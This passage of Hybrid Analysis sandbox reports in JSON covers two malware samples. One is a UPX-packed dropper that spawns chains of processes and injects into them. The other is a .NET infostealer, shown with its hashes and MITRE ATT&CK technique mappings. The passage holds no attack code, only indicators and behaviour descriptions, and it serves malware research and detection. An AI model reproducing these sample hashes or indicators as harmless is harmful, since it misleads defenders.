compressed\"- [targetUID: N/A]\n \"dthhtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hxpnnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rtdhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rtdhhn.exe]- [targetUID: 00000000-00002056]\n \"rjtxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjtxj.exe]- [targetUID: 00000000-00001356]\n \"60024.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60024.exe]- [targetUID: 00000000-00001356]\n \"0642260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0642260.exe]- [targetUID: 00000000-00001348]\n \"8402600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8402600.exe]- [targetUID: 00000000-00001348]\n \"tfftdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfftdr.exe]- [targetUID: 00000000-00002736]\n \"tjbljn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjbljn.exe]- [targetUID: 00000000-00002736]\n \"xdnld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdnld.exe]- [targetUID: 00000000-00002680]\n \"vfdlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfdlx.exe]- [targetUID: 00000000-00003968]\n \"rjlbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjlbb.exe]- [targetUID: 00000000-00003968]\n \"ftnpjx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftnpjx.exe]- [targetUID: 00000000-00001344]\n \"rhpxblx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhpxblx.exe]- [targetUID: 00000000-00003736]\n \"pbdvnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbdvnt.exe]- [targetUID: 00000000-00003736]\n \"bpjjvll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bpjjvll.exe]- [targetUID: 00000000-00003916]\n \"tjphthx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjphthx.exe]- [targetUID: 00000000-00001328]\n \"fdtfnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdtfnb.exe]- [targetUID: 00000000-00000720]\n \"lbvfrdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbvfrdl.exe]- [targetUID: 00000000-00000720]\n \"nhffd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhffd.exe]- [targetUID: 00000000-00000664]\n \"ltnlpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltnlpd.exe]- [targetUID: 00000000-00000468]\n \"rhnlvvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhnlvvj.exe]- [targetUID: 00000000-00000468]\n \"ptppdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptppdf.exe]- [targetUID: 00000000-00000688]\n \"jvvxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jvvxj.exe]- [targetUID: 00000000-00000688]\n \"bdfnxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdfnxb.exe]- [targetUID: 00000000-00003688]\n \"6040224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6040224.exe]- [targetUID: 00000000-00003688]\n \"04048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04048.exe]- [targetUID: 00000000-00003692]\n \"66608.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66608.exe]- [targetUID: 00000000-00003268]\n \"680284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\680284.exe]- [targetUID: 00000000-00003880]\n \"24640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24640.exe]- [targetUID: 00000000-00001372]\n \"204084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\204084.exe]- [targetUID: 00000000-00003280]\n \"240286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240286.exe]- [targetUID: 00000000-00003280]\n \"dltbld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dltbld.exe]- [targetUID: 00000000-00003188]\n \"dhnnvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhnnvp.exe]- [targetUID: 00000000-00001500]\n \"dpdlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpdlf.exe]- [targetUID: 00000000-00002744]\n \"48628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48628.exe]- [targetUID: 00000000-00002744]\n \"4066668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4066668.exe]- [targetUID: 00000000-00001896]\n \"00022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00022.exe]- [targetUID: 00000000-00003336]\n \"0204422.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0204422.exe]- [targetUID: 00000000-00003172]\n \"rjffft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjffft.exe]- [targetUID: 00000000-00003992]\n \"rpdjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpdjn.exe]- [targetUID: 00000000-00003252]\n \"hfbbnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfbbnn.exe]- [targetUID: 00000000-00003308]\n \"phxdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phxdv.exe]- [targetUID: 00000000-00003308]\n \"rdflttb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdflttb.exe]- [targetUID: 00000000-00003712]\n \"vnbvdx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnbvdx.exe]- [targetUID: 00000000-00003712]\n \"vlvdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vlvdf.exe]- [targetUID: 00000000-00000580]\n \"lvnptpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvnptpp.exe]- [targetUID: 00000000-00000580]\n \"04040.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04040.exe]- [targetUID: 00000000-00004252]\n \"6666266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6666266.exe]- [targetUID: 00000000-00002912]\n \"00666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00666.exe]- [targetUID: 00000000-00002404]\n \"hxfhrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hxfhrx.exe]- [targetUID: 00000000-00002404]\n \"jdjdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdjdt.exe]- [targetUID: 00000000-00004372]\n \"nthpjvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nthpjvt.exe]- [targetUID: 00000000-00004184]\n \"xjhvjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjhvjn.exe]- [targetUID: 00000000-00004184]\n \"ddvtj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ddvtj.exe]- [targetUID: 00000000-00006072]\n \"pftnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pftnv.exe]- [targetUID: 00000000-00001208]\n \"xpvvjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xpvvjv.exe]- [targetUID: 00000000-00002412]\n \"pfflf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfflf.exe]- [targetUID: 00000000-00006000]\n \"hxtnlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hxtnlx.exe]- [targetUID: 00000000-00006000]\n \"hthbft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hthbft.exe]- [targetUID: 00000000-00004304]\n \"nhftnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhftnd.exe]- [targetUID: 00000000-00005976]\n \"hvjtfdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hvjtfdj.exe]- [targetUID: 00000000-00005976]\n \"82466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82466.exe]- [targetUID: 00000000-00005636]\n \"420260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\420260.exe]- [targetUID: 00000000-00005636]\n \"466844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\466844.exe]- [targetUID: 00000000-00006128]\n \"80824.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80824.exe]- [targetUID: 00000000-00006116]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has section name UPX1 with entropy \"7.97244478673\"\n \"088822.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xvndjvv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"60884.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ldrttb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rfhlpxb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8668622.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"68646.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6844880.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ljvbrr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rxvjbx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"frbnhn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dthhtb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hxpnnf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rtdhhn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjtxj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"60024.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0642260.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8402600.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tfftdr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tjbljn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xdnld.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vfdlx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjlbb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ftnpjx.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has a section named \"UPX0\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has a section named \"UPX1\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has a section named \"UPX2\"\n \"088822.exe\" has a section named \"UPX0\"\n \"088822.exe\" has a section named \"UPX1\"\n \"088822.exe\" has a section named \"UPX2\"\n \"xvndjvv.exe\" has a section named \"UPX0\"\n \"xvndjvv.exe\" has a section named \"UPX1\"\n \"xvndjvv.exe\" has a section named \"UPX2\"\n \"60884.exe\" has a section named \"UPX0\"\n \"60884.exe\" has a section named \"UPX1\"\n \"60884.exe\" has a section named \"UPX2\"\n \"ldrttb.exe\" has a section named \"UPX0\"\n \"ldrttb.exe\" has a section named \"UPX1\"\n \"ldrttb.exe\" has a section named \"UPX2\"\n \"rfhlpxb.exe\" has a section named \"UPX0\"\n \"rfhlpxb.exe\" has a section named \"UPX1\"\n \"rfhlpxb.exe\" has a section named \"UPX2\"\n \"8668622.exe\" has a section named \"UPX0\"\n \"8668622.exe\" has a section named \"UPX1\"\n \"8668622.exe\" has a section named \"UPX2\"\n \"68646.exe\" has a section named \"UPX0\"\n \"68646.exe\" has a section named \"UPX1\"\n \"68646.exe\" has a section named \"UPX2\"\n \"6844880.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (UID: 00000000-00006116)\n Spawned process \"80824.exe\" (UID: 00000000-00006128)\n Spawned process \"466844.exe\" (UID: 00000000-00005872)\n Spawned process \"420260.exe\" (UID: 00000000-00005636)\n Spawned process \"82466.exe\" (UID: 00000000-00004108)\n Spawned process \"hvjtfdj.exe\" (UID: 00000000-00005976)\n Spawned process \"nhftnd.exe\" (UID: 00000000-00005988)\n Spawned process \"hthbft.exe\" (UID: 00000000-00004304)\n Spawned process \"hxtnlx.exe\" (UID: 00000000-00006000)\n Spawned process \"pfflf.exe\" (UID: 00000000-00002412)\n Spawned process \"xpvvjv.exe\" (UID: 00000000-00001208)\n Spawned process \"pftnv.exe\" (UID: 00000000-00004232)\n Spawned process \"ddvtj.exe\" (UID: 00000000-00006072)\n Spawned process \"xjhvjn.exe\" (UID: 00000000-00004184)\n Spawned process \"nthpjvt.exe\" (UID: 00000000-00004372)\n Spawned process \"jdjdt.exe\" (UID: 00000000-00004388)\n Spawned process \"hxfhrx.exe\" (UID: 00000000-00002404)\n Spawned process \"00666.exe\" (UID: 00000000-00002912)\n Spawned process \"6666266.exe\" (UID: 00000000-00004252)\n Spawned process \"04040.exe\" (UID: 00000000-00001024)\n Spawned process \"lvnptpp.exe\" (UID: 00000000-00000580)\n Spawned process \"vlvdf.exe\" (UID: 00000000-00004420)\n Spawned process \"vnbvdx.exe\" (UID: 00000000-00003712)\n Spawned process \"rdflttb.exe\" (UID: 00000000-00003212)\n Spawned process \"phxdv.exe\" (UID: 00000000-00003308)\n Spawned process \"hfbbnn.exe\" (UID: 00000000-00003252)\n Spawned process \"rpdjn.exe\" (UID: 00000000-00004220)\n Spawned process \"rjffft.exe\" (UID: 00000000-00003992)\n Spawned process \"0204422.exe\" (UID: 00000000-00003172)\n Spawned process \"00022.exe\" (UID: 00000000-00003336)\n Spawned process \"4066668.exe\" (UID: 00000000-00001896)\n Spawned process \"48628.exe\" (UID: 00000000-00002744)\n Spawned process \"dpdlf.exe\" (UID: 00000000-00001500)\n Spawned process \"dhnnvp.exe\" (UID: 00000000-00003188)\n Spawned process \"dltbld.exe\" (UID: 00000000-00005808)\n Spawned process \"240286.exe\" (UID: 00000000-00003280)\n Spawned process \"204084.exe\" (UID: 00000000-00001372)\n Spawned process \"24640.exe\" (UID: 00000000-00003880)\n Spawned process \"680284.exe\" (UID: 00000000-00003520)\n Spawned process \"66608.exe\" (UID: 00000000-00003268)\n Spawned process \"04048.exe\" (UID: 00000000-00003692)\n Spawned process \"6040224.exe\" (UID: 00000000-00003688)\n Spawned process \"bdfnxb.exe\" (UID: 00000000-00002824)\n Spawned process \"jvvxj.exe\" (UID: 00000000-00000688)\n Spawned process \"ptppdf.exe\" (UID: 00000000-00001924)\n Spawned process \"rhnlvvj.exe\" (UID: 00000000-00000468)\n Spawned process \"ltnlpd.exe\" (UID: 00000000-00003472)\n Spawned process \"nhffd.exe\" (UID: 00000000-00000664)\n Spawned process \"lbvfrdl.exe\" (UID: 00000000-00000720)\n Spawned process \"fdtfnb.exe\" (UID: 00000000-00001328)\n Spawned process \"tjphthx.exe\" (UID: 00000000-00004088)\n Spawned process \"bpjjvll.exe\" (UID: 00000000-00003916)\n Spawned process \"pbdvnt.exe\" (UID: 00000000-00003736)\n Spawned process \"rhpxblx.exe\" (UID: 00000000-00003344)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" wrote 32 bytes to a remote process \"C:\\80824.exe\" (Handle: 68)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" wrote 52 bytes to a remote process \"C:\\80824.exe\" (Handle: 68)\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" wrote 4 bytes to a remote process \"C:\\80824.exe\" (Handle: 68)\n \"80824.exe\" wrote 32 bytes to a remote process \"C:\\466844.exe\" (Handle: 116)\n \"80824.exe\" wrote 52 bytes to a remote process \"C:\\466844.exe\" (Handle: 116)\n \"80824.exe\" wrote 4 bytes to a remote process \"C:\\466844.exe\" (Handle: 116)\n \"466844.exe\" wrote 32 bytes to a remote process \"C:\\420260.exe\" (Handle: 72)\n \"466844.exe\" wrote 52 bytes to a remote process \"C:\\420260.exe\" (Handle: 72)\n \"466844.exe\" wrote 4 bytes to a remote process \"C:\\420260.exe\" (Handle: 72)\n \"420260.exe\" wrote 32 bytes to a remote process \"C:\\82466.exe\" (Handle: 116)\n \"420260.exe\" wrote 52 bytes to a remote process \"C:\\82466.exe\" (Handle: 116)\n \"420260.exe\" wrote 4 bytes to a remote process \"C:\\82466.exe\" (Handle: 116)\n \"82466.exe\" wrote 32 bytes to a remote process \"C:\\hvjtfdj.exe\" (Handle: 116)\n \"82466.exe\" wrote 52 bytes to a remote process \"C:\\hvjtfdj.exe\" (Handle: 116)\n \"82466.exe\" wrote 4 bytes to a remote process \"C:\\hvjtfdj.exe\" (Handle: 116)\n \"hvjtfdj.exe\" wrote 32 bytes to a remote process \"C:\\nhftnd.exe\" (Handle: 116)\n \"hvjtfdj.exe\" wrote 52 bytes to a remote process \"C:\\nhftnd.exe\" (Handle: 116)\n \"hvjtfdj.exe\" wrote 4 bytes to a remote process \"C:\\nhftnd.exe\" (Handle: 116)\n \"nhftnd.exe\" wrote 32 bytes to a remote process \"C:\\hthbft.exe\" (Handle: 68)\n \"nhftnd.exe\" wrote 52 bytes to a remote process \"C:\\hthbft.exe\" (Handle: 68)\n \"nhftnd.exe\" wrote 4 bytes to a remote process \"C:\\hthbft.exe\" (Handle: 68)\n \"hthbft.exe\" wrote 32 bytes to a remote process \"C:\\hxtnlx.exe\" (Handle: 120)\n \"hthbft.exe\" wrote 52 bytes to a remote process \"C:\\hxtnlx.exe\" (Handle: 120)\n \"hthbft.exe\" wrote 4 bytes to a remote process \"C:\\hxtnlx.exe\" (Handle: 120)\n \"hxtnlx.exe\" wrote 32 bytes to a remote process \"C:\\pfflf.exe\" (Handle: 68)\n \"hxtnlx.exe\" wrote 52 bytes to a remote process \"C:\\pfflf.exe\" (Handle: 68)\n \"hxtnlx.exe\" wrote 4 bytes to a remote process \"C:\\pfflf.exe\" (Handle: 68)\n \"pfflf.exe\" wrote 32 bytes to a remote process \"C:\\xpvvjv.exe\" (Handle: 116)\n \"pfflf.exe\" wrote 52 bytes to a remote process \"C:\\xpvvjv.exe\" (Handle: 116)\n \"pfflf.exe\" wrote 4 bytes to a remote process \"C:\\xpvvjv.exe\" (Handle: 116)\n \"xpvvjv.exe\" wrote 32 bytes to a remote process \"C:\\pftnv.exe\" (Handle: 68)\n \"xpvvjv.exe\" wrote 52 bytes to a remote process \"C:\\pftnv.exe\" (Handle: 68)\n \"xpvvjv.exe\" wrote 4 bytes to a remote process \"C:\\pftnv.exe\" (Handle: 68)\n \"pftnv.exe\" wrote 32 bytes to a remote process \"C:\\ddvtj.exe\" (Handle: 68)\n \"pftnv.exe\" wrote 52 bytes to a remote process \"C:\\ddvtj.exe\" (Handle: 68)\n \"pftnv.exe\" wrote 4 bytes to a remote process \"C:\\ddvtj.exe\" (Handle: 68)\n \"ddvtj.exe\" wrote 32 bytes to a remote process \"C:\\xjhvjn.exe\" (Handle: 116)\n \"ddvtj.exe\" wrote 52 bytes to a remote process \"C:\\xjhvjn.exe\" (Handle: 116)\n \"ddvtj.exe\" wrote 4 bytes to a remote process \"C:\\xjhvjn.exe\" (Handle: 116)\n \"xjhvjn.exe\" wrote 32 bytes to a remote process \"C:\\nthpjvt.exe\" (Handle: 68)\n \"xjhvjn.exe\" wrote 52 bytes to a remote process \"C:\\nthpjvt.exe\" (Handle: 68)\n \"xjhvjn.exe\" wrote 4 bytes to a remote process \"C:\\nthpjvt.exe\" (Handle: 68)\n \"nthpjvt.exe\" wrote 32 bytes to a remote process \"C:\\jdjdt.exe\" (Handle: 68)\n \"nthpjvt.exe\" wrote 52 bytes to a remote process \"C:\\jdjdt.exe\" (Handle: 68)\n \"nthpjvt.exe\" wrote 4 bytes to a remote process \"C:\\jdjdt.exe\" (Handle: 68)\n \"jdjdt.exe\" wrote 32 bytes to a remote process \"C:\\hxfhrx.exe\" (Handle: 68)\n \"jdjdt.exe\" wrote 52 bytes to a remote process \"C:\\hxfhrx.exe\" (Handle: 68)\n \"jdjdt.exe\" wrote 4 bytes to a remote process \"C:\\hxfhrx.exe\" (Handle: 68)\n \"hxfhrx.exe\" wrote 32 bytes to a remote process \"C:\\00666.exe\" (Handle: 120)\n \"hxfhrx.exe\" wrote 52 bytes to a remote process \"C:\\00666.exe\" (Handle: 120)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1
https://hybrid-analysis.com/sample/3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1
Hybrid Analysis - Infostealers
{"size": 179712, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1", "sha256": "3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1", "av_detect": 86, "vx_family": "MSIL.Krypt.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 182, "processes": [{"uid": "00000000-00006044", "name": "3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe", "normalized_path": "C:\\3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe", "sha256": "3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", 